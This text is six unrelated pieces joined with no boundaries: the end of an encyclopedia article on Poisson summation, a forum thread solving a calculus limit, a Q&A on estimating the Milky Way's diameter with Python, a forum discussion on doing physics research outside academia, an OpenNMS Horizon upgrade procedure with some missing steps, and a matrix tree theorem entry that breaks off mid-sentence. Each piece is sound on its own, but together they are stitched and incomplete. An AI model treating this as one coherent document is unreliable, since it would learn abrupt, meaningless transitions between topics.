\sum_{\nu\in\Lambda}\hat{f}(\nu)e^{2\pi i x\cdot\nu},     (Stein & Weiss 1971, VII §2) where both series converge absolutely and uniformly on Λ. When d = 1 and x = 0, this gives the formula given in the first section above. More generally, a version of the statement holds if Λ is replaced by a more general lattice in Rd. The dual lattice Λ′ can be defined as a subset of the dual vector space or alternatively by Pontryagin duality. Then the statement is that the sum of delta-functions at each point of Λ, and at each point of Λ′, are again Fourier transforms as distributions, subject to correct normalization. This is applied in the theory of theta functions, and is a possible method in geometry of numbers. In fact in more recent work on counting lattice points in regions it is routinely used − summing the indicator function of a region D over lattice points is exactly the question, so that the LHS of the summation formula is what is sought and the RHS something that can be attacked by mathematical analysis. ### Selberg trace formula Further generalisation to locally compact abelian groups is required in number theory. In non-commutative harmonic analysis, the idea is taken even further in the Selberg trace formula, but takes on a much deeper character. A series of mathematicians applying harmonic analysis to number theory, most notably Martin Eichler, Atle Selberg, Robert Langlands, and James Arthur, have generalised the Poisson summation formula to the Fourier transform on non-commutative locally compact reductive algebraic groups G with a discrete subgroup \Gamma such that G/\Gamma has finite volume. For example, G can be the real points of GL_n and \Gamma can be the integral points of GL_n. In this setting, G plays the role of the real number line in the classical version of Poisson summation, and \Gamma plays the role of the integers n that appear in the sum. The generalised version of Poisson summation is called the Selberg Trace Formula, and has played a role in proving many cases of Artin's conjecture and in Wiles's proof of Fermat's Last Theorem. The left-hand side of (1) becomes a sum over irreducible unitary representations of G, and is called "the spectral side," while the right-hand side becomes a sum over conjugacy classes of \Gamma, and is called "the geometric side." The Poisson summation formula is the archetype for vast developments in harmonic analysis and number theory. ## Notes 1. ^ \hat{f}(\nu)\ \stackrel{\mathrm{def}}{=}\int_{-\infty}^{\infty} f(x)\ e^{-2\pi i\nu x}\, dx. ## References 1. ^ H. M. Edwards (1974). Riemann's Zeta Function. Academic Press. ISBN 0-486-41740-9. (pages 209-211) • Benedetto, J.J.; Zimmermann, G. (1997), "Sampling multipliers and the Poisson summation formula", J. Fourier Ana. App. 3 (5). • Córdoba, A., "La formule sommatoire de Poisson", C.R. Acad. Sci. Paris, Series I 306: 373–376. • Gasquet, Claude; Witomski, Patrick (1999), Fourier Analysis and Applications, Springer, pp. 344–352, . • Grafakos, Loukas (2004), Classical and Modern Fourier Analysis, Pearson Education, Inc., pp. 253–257, . • Higgins, J.R. (1985), "Five short stories about the cardinal series", Bull. Amer. Math. Soc. 12 (1): 45–89, . • . • Katznelson, Yitzhak (1976), An introduction to harmonic analysis (Second corrected ed.), New York: Dover Publications, Inc, • Pinsky, M. (2002), Introduction to Fourier Analysis and Wavelets., Brooks Cole. • Stein, Elias; Weiss, Guido (1971), Introduction to Fourier Analysis on Euclidean Spaces, Princeton, N.J.: Princeton University Press, . • . This article was sourced from Creative Commons Attribution-ShareAlike License; additional terms may apply. World Heritage Encyclopedia content is assembled from numerous content providers, Open Access Publishing, and in compliance with The Fair Access to Science and Technology Research Act (FASTR), Wikimedia Foundation, Inc., Public Library of Science, The Encyclopedia of Life, Open Book Publishers (OBP), PubMed, U.S. National Library of Medicine, National Center for Biotechnology Information, U.S. National Library of Medicine, National Institutes of Health (NIH), U.S. Department of Health & Human Services, and USA.gov, which sources content from all federal, state, local, tribal, and territorial government publication portals (.gov, .mil, .edu). Funding for USA.gov and content contributors is made possible from the U.S. Congress, E-Government Act of 2002. Crowd sourced content that is contributed to World Heritage Encyclopedia is peer reviewed and edited by our editorial staff to ensure quality scholarly research articles.
1. ## limit problem $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ 2. Originally Posted by thangbe $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ Several approaches are possible. There's a simple one if you know differential calculus ..... you can consider the function $\displaystyle f(a) = \frac{1}{\sqrt{a + 2}}$. Then, with a (perhaps disquieting) change from the usual notation ($\displaystyle x$ instead of $\displaystyle h$, $\displaystyle a$ instead of $\displaystyle x$) you can consider the derivative of $\displaystyle f(a)$ from first principles: $\displaystyle f'(a) = \lim_{x \rightarrow 0} \frac{f(a + x) - f(a)}{x}$. So the answer will be the derivative of f(a) with respect to a .... 3. Originally Posted by thangbe $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x}$ If you set x= 0, the numerator is $\displaystyle \frac{1}{\sqrt{a+ 2}}- \frac{1}{\sqrt{a}}$ which is clearly NOT equal to 0 but the denominator is 0. Obviously this limit does not exist. 4. Originally Posted by HallsofIvy If you set x= 0, the numerator is $\displaystyle \frac{1}{\sqrt{a+ 2}}- \frac{1}{\sqrt{a}}$ which is clearly NOT equal to 0 but the denominator is 0. Obviously this limit does not exist. Dang it. I misread the red x for a 2: ]$\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+{\color{red}x}}}}{x}$ Hmmmmmm ... I bet that red x is meant to be a 2 .... 5. the limit is exists and the answer is. $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x} =\frac {-1}{2{(a+2)}^\frac{3}{2}}$ but I don't know how to show for it. 6. Originally Posted by thangbe the limit is exists and the answer is. $\displaystyle =\lim _{x->0} \frac{\frac{1}{\sqrt{a+x+2}} - \frac{1}{\sqrt{a+x}}}{x} =\frac {-1}{2{(a+2)}^\frac{3}{2}}$ but I don't know how to show for it. So you have mistyped the question as I suspected - see post #4. One way of getting the answer is given in post #2. Study it. If you do not understand that method, then you will need to say so. There are several other methods that can be used. 7. I understand in your post #2 that why I get that answer. However my teacher didn't allows us to use that menthod thank you for you help sir. 8. Clearly there is a typo. But once that is resolved, my favourite way to solve these type of limits is by multiplying by the conjugate. Not many people teach that these days. 9. Originally Posted by matheagle Clearly there is a typo. But once that is resolved, my favourite way to solve these type of limits is by multiplying by the conjugate. Not many people teach that these days. I was going to do that but decided it was too much work to type it up. 10. I agree. I'm helping someone right now. But substituting the math and typing tex at the same is tough for me. I'm afraid I'll do a stupid calculation and I cannot edit after 15 minutes. Leaving forever with a dumb math error. That would be embarassing. I really like the conjugate technique. 11. uhm... could you just simply tell me the procedure.? or just give a simple example. So that I can figure it out.... I was stuck in how to get x out of the squareroot value. 12. Originally Posted by thangbe I understand in your post #2 that why I get that answer. However my teacher didn't allows us to use that menthod thank you for you help sir. Note that $\displaystyle \frac{1}{\sqrt{a + x + 2}} - \frac{1}{\sqrt{a+2}} = \frac{\sqrt{a+2} - \sqrt{a+x+2}}{\sqrt{a+x+2} \, \sqrt{a+2}}$. Therefore: $\displaystyle \frac{\frac{1}{\sqrt{a + x + 2}} - \frac{1}{\sqrt{a+2}}}{x} = \frac{\sqrt{a+2} - \sqrt{a+x+2}}{x \sqrt{a+x+2} \, \sqrt{a+2}}$ $\displaystyle = \frac{(\sqrt{a+2} - \sqrt{a+x+2}) \cdot (\sqrt{a+2} + \sqrt{a+x+2})}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{(a + 2) - (a + x + 2)}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{-x}{x \sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$ $\displaystyle = \frac{-1}{\sqrt{a+x+2} \, \sqrt{a+2} \cdot (\sqrt{a+2} + \sqrt{a+x+2})}$. Now take the limit $\displaystyle x \rightarrow 0$. 13. thank you so much for helping
# Estimating of the size of the Milky Way from the Sun's motion I am trying to run a simple first-principles calculation to estimate the diameter of the Milky Way from what we know about the motion of the Sun around its center. In particular, from various online sources and books, we can roughly say that: • The period of the Sun's orbit around the center of the Milky Way is $$T_{sun}\approx 200$$ million years. • The speed of the Sun in its orbit is $$v_{sun}\approx 200$$ km/s. • The sun is located about halfway between the Milky Way's center and its edge. This is a purely kinematic problem. I'll assume that the Sun's orbit is circular, so that we may write: $$\omega_{sun}r_{sun} = v_{sun},$$ where $$\omega_{sun}=2\pi/T_{sun}$$ is the angular velocity of the Sun around the Milky Way center. Hence: $$r_{sun} = \frac{T_{sun}}{2\pi}v_{sun}.$$ The radius of the Milky Way is twice that (the Sun is halfway out to the edge), and the diameter is twice that again. So the overall diameter of the Milky Way, in light years (denoting the speed of light by $$c$$): $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{c\pi}.$$ We know all the quantities on the right hand side. A short Python code evaluates the solution. T_sun = (200e6)*365.25*24*3600 # [s] v_sun = 200e3 # [m/s] c = 2.99792458e8 # [m/s] pi = 3.14159 d_MilkyWay = 2*T_sun*v_sun/(c*pi) # [ly] print "d_MilkyWay = %.2e [light years]"%(d_MilkyWay) The answer: $$d_{MilkyWay} = 2.68\cdot 10^{12}$$ light years. This is much, much larger than the current best estimate given by scientists: about $$10^5$$ light years. How come there is such a huge discrepancy between the measured size, and my rough estimate? Is the assumption that the Sun's orbit is circular wrong? • Wait - are you missing a huge problem? Gravity is totally f'd up in galaxies, it doesn't behave anything, at all, like it "should". Google up "galaxy rotation problem!" – Fattie Sep 14 '20 at 19:22 • The galaxy rotation problem doesn't have much to do with the Sun's revolution around the center of the galaxy. – chepner Sep 14 '20 at 22:52 • BTW, math.pi() gets you more digits of precision. – Acccumulation Sep 14 '20 at 23:06 • @Acccumulation: Using a not-so-precise value for $\pi$ could actually be considered a feature here, since it shows that it's just some back-of-the-envelope calculation, and it won't be used for rocket science. Who cares about $\frac{3.14159}{3.1415926535 8979323846 2643383279}$ when the assumptions are wrong by ~15% and the calculations are wrong by a factor 31536000? – Eric Duminil Sep 15 '20 at 8:04 • @EricDuminil Yeah, I thought about that. But the OP cares enough to get $c$ to the last digit. – Acccumulation Sep 15 '20 at 18:19 You messed up a bit in your calculation. Your answer is in light-seconds, not light-years. If you divide by the number of seconds in a year, you'll get the correct answer. T_sun = (200e6)*365.25*24*3600 # [s] v_sun = 200e3 # [m/s] c = 2.99792458e8 # [m/s] pi = 3.14159 d_Milkyway_m = 2*T_sun*v_sun/pi # [m] d_MilkyWay = d_Milkyway_m/(c*365.25*24*3600) # [ly] print "d_MilkyWay = %.2e [light years]"%(d_MilkyWay) • Or alternatively, don't convert T_sun to seconds in the first place! :) – Philip Sep 13 '20 at 20:42 • Yep, that's probably easier when it comes to the number of operations but could be harder when it comes to figuring out the units at each step :) – Leo Adberg Sep 13 '20 at 20:43 • Wow! Rookie mistake, thanks a lot :) – space_voyager Sep 13 '20 at 21:52 It took me embarrassingly long to figure this out. Your calculations are mostly correct, except at the end. The "diameter" of the Milky Way would indeed be $$d = 2 \frac{T_\text{sun} v_\text{sun}}{c\pi},$$ but this is in light-seconds not years. You need to further divide this by the number of seconds in one year. And if you do this, you will find that $$d \approx 85,000 \text{ light years}.$$ (Alternatively, and perhaps much more efficiently, you could just measure $$T_\text{sun}$$ in years, that would give the same answer with fewer calculations.) Dimensional analysis is hard, and I just wanted to verify the calculations of other answers here. Since you are using Python, you should know that there are tools that can assist in dimensional analysis; These tools can be very helpful and would in this case show you where you went wrong. Taking your sample code and turning it into a dimensional one, using pint (other tools for dimensional analysis are available), will look as follows: import pint U = pint.UnitRegistry() T_sun = 200e6 * U.years v_sun = 200 * U.km / U.s r_sun = (T_sun / (2 * U.pi)) * v_sun d_milkyway = 2 * 2 * r_sun print('d_milkyway ~ {:.1f}'.format(d_milkyway.to('light_years'))) Which yields d_milkyway ~ 84941.4 light_year Note that if we omit the conversion to('light_years'), we would see d_milkyway ~ 8.0e+10 kilometer * year / pi / second • Ooh, what a nice-looking tool! – rob Sep 14 '20 at 15:43 • Oh, and I should mention that if you mess up the units and try to convert to an incompatible unit, you will get an error (that's half the point of pint), e.g. should you accidentally divide by v_sun instead of multiply, pint would say Cannot convert from [time] ** 2 / [length] to [length]. – Pål GD Sep 14 '20 at 21:46 • Excellent answer. And using the incorrect formula above, with $c$ : (2 * 200e6 * U.years * 200 * (U.km / U.s) / (U.pi * U.speed_of_light)).to('lightyear') fails with Cannot convert from 'kilometer * year / pi / second / speed_of_light' ([time]) to 'light_year' ([length]). Years aren't light-years and pint knows it. Cool little library! – Eric Duminil Sep 15 '20 at 7:57 • You can also use to_base_units() which converts it (in this case) to seconds. – Pål GD Sep 15 '20 at 10:44 # Problem: Wrong units $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{c\pi}$$ And that's your first problem, right here. You cannot disregard units and expect to get any correct or even well-defined result from your calculations. The left-hand side is a distance (e.g. in meters, light-years or light-seconds), the right-hand side is a duration. This cannot work, and you cannot use this equation anywhere. Light-years are not years, just like light-seconds are not seconds. # Solution: Remove $$c$$ The correct formula is simply: $$d_{MilkyWay} = \frac{2T_{sun}v_{sun}}{\pi}$$ # Order of magnitude Before using any tool in order to calculate the exact result, you should first try to get some idea about the correct order of magnitude (see Fermi problem). The goal should be to simplify the calculation until it becomes easy to do mentally, without being too wrong. So $$3 \approx 1$$ and $$4 \approx 10$$ are perfectly acceptable, but $$10^5\approx10^{12}$$ isn't. You could notice that 200 km/s is approximately $$\frac{c}{1000}$$. Here's the order-of-magnitude estimate: \begin{align} d_{MilkyWay} & \approx \frac{2v_{sun}T_{sun}}{\pi} \\ & \approx \frac{2*200\mathrm{km/s}*200\thinspace000\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{2*\frac{c}{1\thinspace000}*200\thinspace000\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{2*c*200\thinspace000\mathrm{y}}{\pi} \\ & \approx \frac{400\thinspace000}{\pi}*c*\mathrm{y} \\ & \approx 100\thinspace000 \mathrm{ly} \end{align} This is not the exact answer. But whichever tool you use, you should expect to get a result not too far away from $$10^{5}\mathrm{ly}$$. # Result ## With Python If you want to stick with Python, you could use @PålGD's excellent answer. ## With Wolfram Alpha Wolfram Alpha does a good job at converting units: 2*200km/s*200million years/pi to lightyears You get many different units as a bonus, and even a direct comparison to the correct galactic diameter: ## With Qalculate Qalculate! is an excellent desktop calculator, and it supports many units: • Why is the total number of limbs 10 instead of 1? – Itsme2003 Sep 15 '20 at 2:39 • @Itsme2003: Interesting question. There's more info at what-if.xkcd.com/84 (linked from the comic above). Basically, it's because we're talking about orders of magnitude, so it makes sense to use a logarithmic scale. And on this scale, $10^{0.5} = \sqrt(10) \approx 3.16$ is right in the middle of $10^{0} = 1$ and $10^{1} = 10$. So 3 rounds to 1 because it's smaller than 3.16, and 4 rounds to 10 because it's larger than 3.16. – Eric Duminil Sep 15 '20 at 7:00
Leaving Academia While Still Contributing to Physics Research • Physics Main Question or Discussion Point There is a Theoretical Physicist by the name of Garret Lisi. He gave a ted Talk on one of his unified physics theories that received a lot of attention. The reason why I am bringing him up is because he left academia after he finished his phd and moved to Maui. During his time there he found part time gigs just to get by but didn't want to make big commitments because he feared it would take away too much time from his research. I believe now he's financially stable and is able to contribute successfully to Physics without being in Academia. I guess what I'm trying to ask is: do you really need to be in academia to be a successful theoretical physicist ( not experimental), since they don't work in labs. In today's day and age, it is easier than it has ever been to make passive income as a result of the development of technology, social media etc. I recently completed a double major in mathematics and physics and plan on pursuing a phd program in theoretical particle physics and want to live the lifestyle of Garret Lisi. Answers and Replies Related STEM Career Guidance News on Phys.org George Jones Staff Emeritus Science Advisor Gold Member Garret Lisi shows that this is possible, but, unfortunately,the set $\left\{ \mathrm{Garret ~ Lisi} \right\}$ is not a statistically relevant sample. Orodruin Staff Emeritus Science Advisor Homework Helper Gold Member 2018 Award Garret Lisi shows that this is possible, but, unfortunately,the set $\left\{ \mathrm{Garret ~ Lisi} \right\}$ is not a statistically relevant sample. It also suffers from selection bias... Thank you Dr. Jones and Oruduin for your replies. You're certainly right that the example I gave is not statistically significant. But if a theoretical physicist hypothetically found a way to financially support themselves, then what is the added benefit of going into academia if you can conduct the research on your own. If you found a way to get passive income that doesn't demand as much time as the administrative and teaching duties of a professor then wouldn't it be better to avoid academia if you can still do research on your own? Choppy Science Advisor Education Advisor It's probably worth asking the question - if it's so great, why aren't there more people doing it? I think one factor to consider is that "passive income" is either not as passive as it sounds, or doesn't provide much in the way of reliable, steady income. Secondly, even if you're a theorist, it's quite challenging to do research in a vacuum. Consider journal access - a lot more of a challenge if you're not affiliated with a university. Simply having other people to have passive hallway conversations with can have an enormous influence on your work too. Ever have an idea that sounded good in your head, but then fell apart as soon as you started explaining it to someone? Without being around other academics, those ideas might get all the way to a journal submission before someone checks you. Think about colloquia-speakers coming in both from around campus and from other universities to share their work. How will you gain access to those kinds of ideas on your own? And what about conferences for that matter? Students, particularly graduate students can often be a lot of help too. They challenge you, force you to reinforce your own knowledge and re-examine foundational ideas in your field. And they bring new ideas and enthusiasm with them. There is also the question of how you'll handle it when research isn't going well. When you're on your own, it's a lot easier to shrug it off and do something else. When you've got collaborators counting on your contribution to a grant proposal, you push through even when the personal motivation isn't there. That's not to say it can't be done, doing research on your own, but it's rare for people to do it successfully and I think there are a lot of reasons behind that. WWGD Science Advisor Gold Member Well, Wyatt. now you know the cavets so you can plan ahead see if you can build around them and see if you want to stick with it. Vanadium 50 Staff Emeritus Science Advisor Education Advisor I think you need to take a closer look at Lisi before you try and emulate him. 1. The reason that the press ran with this story is precisely because it is unusual. ("Man bites dog" and all) 2. Lisi's impact on the field is not nearly as large as the press might have you believe. His most cited paper has 54 cites, with very few "big names" citing it: Bjorken says it's interesting and Distler says it's wrong. (I'm an experimenter who has written a few theory papers, and my theory publication record is stronger than Lisi's) 3. Even Lisi writes with collaborators, and in fact, his citation count for papers with co-authors is higher than that he wrote alone. (That's kind of why we do it) If you want to do this because you want to do this, great. Have at it. But if you think you are going to make a huge impact doing this, you might want to rethink this. Last edited: gleem Science Advisor Education Advisor @wyattbohr I think that when Lisi was at your point in his education he had no idea that he would be where he is today. If it were not for an investment break he might not be in Maui today. His work and interest is controversial so remaining in academia might not have been something of his choosing. His creation of a science hostel may indicate that he may feel a need or recognize that closer contact with fellow researchers has advantages. Communication via the internet is clumsy and not spontaneous as compared to direct face to face interactions nor as stimulating. ....and want to live the lifestyle of Garret Lisi. I believe this is poor focus for a potential PhD candidate to have. Dr. Courtney Education Advisor Gold Member 2018 Award Most of my publications were authored at times when I did not hold a college faculty position, including everything I've published in the past 5 years. It is mostly meat and potatoes work in blast physics and ballistics. So yes, I am making contributions to physics, but nothing earth shattering. So, it's certainly possible. But since I rarely publish solo papers, interactions with students and colleagues is essential to my creative process. I've managed to cultivate and maintain these relationships without holding a faculty position. But it takes more work and an intentional approach. I may not publish any papers in 2019, because of a lull in collaborative activities. No worries though, I'm already working on several projects with colleagues that will be ready for publication in 2020 and/or 2021. ZapperZ Staff Emeritus Science Advisor Education Advisor 2018 Award Thank you Dr. Jones and Oruduin for your replies. You're certainly right that the example I gave is not statistically significant. But if a theoretical physicist hypothetically found a way to financially support themselves, then what is the added benefit of going into academia if you can conduct the research on your own. If you found a way to get passive income that doesn't demand as much time as the administrative and teaching duties of a professor then wouldn't it be better to avoid academia if you can still do research on your own? But as a "researcher", you could have easily do a research on this. For example, if this is statistically significant, then MORE Garrett Lisi would have been around and more of them would be prominent. You also have this idea that one does "theoretical physics" in a vacuum. The support of an institution is often necessary to (i) get access to the latest publications, etc... (ii) to go to conferences where many ideas get hatched, developed, regurgitated, washed-and-spun-dry, etc.... (iii) establish new contacts/network/etc. If you look closely, there are very few theoretical papers with only ONE author, or without much support and interactions. The fact that places such as Institute for Advanced Studies, and Perimeter Institute exist and became successful and useful is an "experimental data" that even theoretical physics need institutional support and external interactions. And I haven't even gotten to areas of theoretical physics that require huge computational support to produce simulations and results. What individual do you think have such facility in his/her garage? Zz. It is possible, but also extremely challenging and publishing takes more time, since you literally have to find the time. I myself have taken this path and I actually finance my own theoretical research from my profession as a medical practitioner. Software licenses and literature access are granted to me freely by having ties with a university department by remaining friends with a few of the staff, occassionally publishing together with them and helping them and their students with research, e.g. guiding students and advising w.r.t. methodology and technical aspects of research. Also you should worry somewhat but again not worry too much about performance indicators such as having high citation indices; these indices do not necessarily measure what they are aiming to measure, namely how you and your work actually compare to your peers and their work. It is important to realize that such measures were invented for intended usage by administrators in order to systematically select, hire and pay researchers while giving the illusion of doing this in a scientific manner i.e. it is almost irrelevant for someone outside academia. Moreover, in contrast to popular belief there are in fact many cases where different kinds of works and workers are actually incomparable, e.g. technical work focused on short term progress within a mature research programme as opposed to conceptual work focused on long term progress within a novel research programme, as well as the likes of Newton, Gauss or Grothendieck in comparison with their contemporaries: mathematical skill is not normally distributed! Conceptual work is usually characteristic of the kind of original research that outsiders do, including Garrett Lisi and Julian Barbour, i.e. when one is not merely doing technical research but also doing foundational, conceptual and/or non-technical theoretical research. This kind of work usually tends to not be capable of being easily done by simply replacing oneself by someone else if that other person lacks the necessary idiosyncratic background, insight, creativity, vision and persistence required for this type of work; in such cases, citation indices are completely misleading metrics, practically of no use whatsoever a priori, perhaps only useful a posteriori. From my own experience and academic circle, most recent graduates I have met in academia simply lack the creativity, drive and boldness to actually do real foundational work while the majority of graduate students are simply incapable of entirely creating and running their own original research programme at a sophisticated level; instead, they opt for lower hanging fruit and a safer career path. Only a few of them become capable of doing this somewhat later in life and even then they tend - due to their training - to be more proficient at being a specialist, while what is required for such work is the mind of a generalist. Historically, there are loads of big names to be named for which the above characterization was true, and it is usually more true for theoreticians and mathematicians who do more creative mathematical work constructing new foundations both in physics and in mathematics; think of the likes of Newton, Euler, Gauss, Riemann, Lagrange, Hamilton, Ramanujan, Einstein, Poincaré, Feynman and so on who tended to be guided more for deeply personal reasons than by what academia and the contemporary literature wanted. Notice how the founders of QT are not on this list; this has alot to do with the current foundations of QT still being an embarrassment and I maintain that completing the research programme of constructive QFT is the only way out for QT, but I digress. As I have mentioned, foundational work actually requires creativity, but creativity while necessary is not sufficient. One has to also be trained in doing academic research, i.e. know how to effectively read the literature, find reviews, critical appraisal of topics, mastery of certain techniques, familiarity with certain theories and so on; this skillset is most effectively learned by staying within academia, but again that is not necessary especially if one has a mentor, close friend or family member who is in academia and can guide them through such hoops. In any case, with sufficient discipline this can be self-taught as well but it is alot of work and there aren't (m)any guides available i.e. you have to pick yourself up by your own bootstraps and (re)invent this for yourself; this is why these skills are best picked up by shadowing, emulation and osmosis of the day to day activities of active researchers. PAllen Science Advisor Most of my publications were authored at times when I did not hold a college faculty position, including everything I've published in the past 5 years. It is mostly meat and potatoes work in blast physics and ballistics. So yes, I am making contributions to physics, but nothing earth shattering. Seems like it could be earth shattering ... Dr. Courtney Education Advisor Gold Member 2018 Award Seems like it could be earth shattering ... Most of my theory work in blast and ballistics has focused on injury mechanisms and exposure thresholds for causing injury. My experimental work in blast and ballistics has focused on inventing laboratory scale devices for creating experimental blast waves without the expense and handling difficulties of using real high explosives. Over the past year or two, my personal motivation has shifted from "contributing to physics" to "training the next generation of scientists." So most of my "best ideas" get shelved until a student or colleague comes along looking for a project. I see my "best ideas" as the most fertile training ground for younger scientists. My resume does not need much more enhancement. For example, with the increases in computer speed and memory over the past 25 years, it would be a simple matter to dust off my old atomic physics codes and crank out a few papers for Physical Review A (or similar). These would be relatively modest contributions to a field known as quantum chaos. But this would all me much more meaningful for some younger scientist than for me. I have a steady stream of students knocking at my door wanting help with research (and I welcome them). The trick is matching their interests and abilities to the available project ideas. That gets harder if I carry out my best project ideas as a solo act.
This procedure describes how to do a basic Horizon upgrade. You may need to complete additional steps to upgrade in a more complex setup (for example, if you run more than one Horizon instance, have more complex database migration requirements, or depending on the age of current version). If you use Git to track changes to your configuration files, see Upgrade Horizon with Git. Make sure you complete the tasks in the before you begin section before starting. In addition, if the system requirements for the new version require you to upgrade your PostgreSQL database, you must do this before the Horizon upgrade. ## Update and verify the Horizon repository • CentOS/RHEL • Debian/Ubuntu Your Horizon repository is defined in the `/etc/yum.repos.d/` directory. The file may be named `opennms-repo-stable-<OSversion>.repo`, but it is not guaranteed to be. ``````yum -y install yum-utils yum-config-manager --enable opennms-repo-stable-*`````` 3. Purge any cached yum data: ``yum clean all`` 4. Make a backup copy of your config: ``````rsync -Ppav ${OPENNMS_HOME}/etc /tmp/etc.orig rsync -Ppav${OPENNMS_HOME}/jetty-webapps/opennms/WEB-INF /tmp/opennms-web-inf`````` ``yum -y upgrade opennms`` ``yum-config-manager --disable opennms-repo-stable-*`` 7. Upgrade Java 11 to the latest release: ``yum -y install java-11-openjdk java-11-openjdk-devel`` 8. Use the `runjava` command to set the JVM that Horizon will use: ``${OPENNMS_HOME}/bin/runjava -s`` 9. Check for configuration file changes and update accordingly using the files you backed up in identify changed configuration files. If you upgrade in place, Horizon renames any shipped config that conflicts with an existing user-modified config to `.rpmnew` or `.rpmsave`. Inspect these files manually and reconcile any differences. Use `diff -Bbw` and `diff -y` to look for changes. If any `.rpmnew` or `.rpmsave` files exist within the configuration directory, services will not start. 10. Run the Horizon installer: ``${OPENNMS_HOME}/bin/install -dis`` The upgrade may take some time. An "Upgrade completed successfully!" message confirms that the upgrade has completed. If you do not get this message, check the output of the install command for any errors. 11. Clear the Karaf cache: ``yes | ${OPENNMS_HOME}/bin/fix-karaf-setup.sh`` 12. Start Horizon: ``systemctl start opennms.service`` `tail -F${OPENNMS_HOME}/logs/manager.log` shows the Horizon startup progress. 13. The upgrade is completed and operation resumes. Make sure that you clear your browser’s cache before using the Horizon web UI against the upgraded version. This is especially important for pages that use JavaScript heavily (for example, the Requisitions UI). Your Horizon repository is defined in the `/etc/apt/sources.list` directory. The file may be named `opennms-repo-stable-<OSversion>.repo`, but it is not guaranteed to be. ``````sudo apt-mark unhold libopennms-java \ libopennmsdeps-java \ opennms-common \ opennms-db`````` 3. Purge any cached data: ``apt-get clean`` 4. Make a backup copy of your config: ``````rsync -Ppav ${OPENNMS_HOME}/etc /tmp/etc.orig rsync -Ppav${OPENNMS_HOME}/jetty-webapps/opennms/WEB-INF /tmp/opennms-web-inf`````` ``apt-get upgrade opennms`` ``````sudo apt-mark hold libopennms-java \ libopennmsdeps-java \ opennms-common \ opennms-db`````` 7. Upgrade Java 11 to the latest release: ``apt-get install openjdk-11-jdk-headless openjdk-11-jre-headless`` 8. Use the `runjava` command to set the JVM that Horizon will use: ``${OPENNMS_HOME}/bin/runjava -s`` 9. Check for configuration file changes and update accordingly using the files you backed up in identify changed configuration files. Debian prompts you to keep or overwrite your files during the `apt upgrade` process. Inspect these files manually and reconcile any differences. Use `diff -Bbw` and `diff -y` to look for changes. 10. Run the Horizon installer: ``${OPENNMS_HOME}/bin/install -dis`` The upgrade may take some time. An "Upgrade completed successfully!" message confirms that the upgrade has finished. If you do not get this message, check the output of the install command for any errors. 11. Clear the Karaf cache: ``yes | ${OPENNMS_HOME}/bin/fix-karaf-setup.sh`` 12. Start Horizon: ``systemctl start opennms.service`` `tail -F${OPENNMS_HOME}/logs/manager.log` shows the Horizon startup progress. 13. The upgrade is completed and operation resumes. Make sure that you clear your browser’s cache before using the Horizon web UI against the upgraded version. This is especially important for pages that use JavaScript heavily (for example, the Requisitions UI).
# Matrix tree theorem Let $G = ( V , E )$ be a graph with $\nu$ vertices $\{ v _ { 1 } , \dots , v _ { \nu } \}$ and edges $\{ e _ { 1 } , \dots , e _ { \epsilon } \}$, some of which may be oriented. The incidence matrix of $G$ is the $( \nu \times \epsilon )$-matrix $M = [ m _ { i j } ]$ whose entries are given by $m _ { i j } = 1$ if $e_{j}$ is a non-oriented link (i.e. an edge that is not a loop) incident to $v_i$ or if $e_{j}$ is an oriented link with head $v_i$, $m _ { i j } = - 1$ if $e_{j}$ is an oriented link with tail $v_i$, $m _ { i j } = 2$ if $e_{j}$ is a loop (necessarily non-oriented) at $v_i$, and $m _ { i j } = 0$ otherwise. The mixed Laplacian matrix of $G$ is defined as $L = [ l _ {i j } ] = M M ^ { T }$. It is easy to see that the diagonal entries of $L$ give the degrees of the vertices with, however, each loop contributing $4$ to the count, and the off-diagonal entry $l_{i j}$ gives the number of non-oriented edges joining $v_i$ and $v _ { j }$ minus the number of oriented edges joining them. Let $\tau ( G )$ denote the number of spanning trees of $G$, with orientation ignored. The matrix tree theorem in its classical form, which is already implicit in the work of G. Kirchhoff [a9], states that if $L$ is the Laplacian of any orientation of a loopless undirected graph $G$ and $L ^ { * }$ is the matrix obtained by deleting any row $s$ and column $t$ of $L$, then $\tau ( G ) = ( - 1 ) ^ { s + t } \operatorname { det } ( L ^ { * } )$; that is, each cofactor of $L$ is equal to the tree-number of $G$. If $\operatorname{adj}( L )$ denotes the adjoint of the matrix $L$ and $J$ denotes the matrix with all entries equal to $1$, then $\operatorname { adj } ( L ) = \tau ( G ) J$. The proof of this theorem uses the Binet–Cauchy theorem to expand the cofactor of $L$ together with the fact that every non-singular $( \nu - 1 ) \times ( \nu - 1 )$-minor of $M$ (cf. also Minor) comes from a spanning tree of $G$ having value $\pm 1$. In the case of the complete graph $K _ { \nu }$ (with some orientation), $L = \nu I - J$, and it can be seen that $\tau ( K _ { \nu } ) = \nu ^ { \nu - 2 }$, which is Cayley's formula for the number of labelled trees on $\nu$ vertices [a4]. Temperley's result [a3], Prop. 6.4, avoids using the cofactor notation in the following form: $\nu ^ { 2 } \tau ( G ) = \operatorname { det } ( J + L )$. It is interesting to note that this determinantal way of computing $\tau ( G )$ requires $\nu ^ { 3 }$ operations rather than the $2 ^ { \nu }$ operations when using recursion [a17], p. 66. For a loopless directed graph $G$, let $L ^ { - } = D ^ { - } - A ^ { \prime }$ and $L ^ { + } = D ^ { + } - A ^ { \prime }$, where $D ^ { - }$ and $D ^ { + }$ are the diagonal matrices of in-degrees and out-degrees in $G$, and the $i j$-entry of $A ^ { \prime }$ is the number of edges from 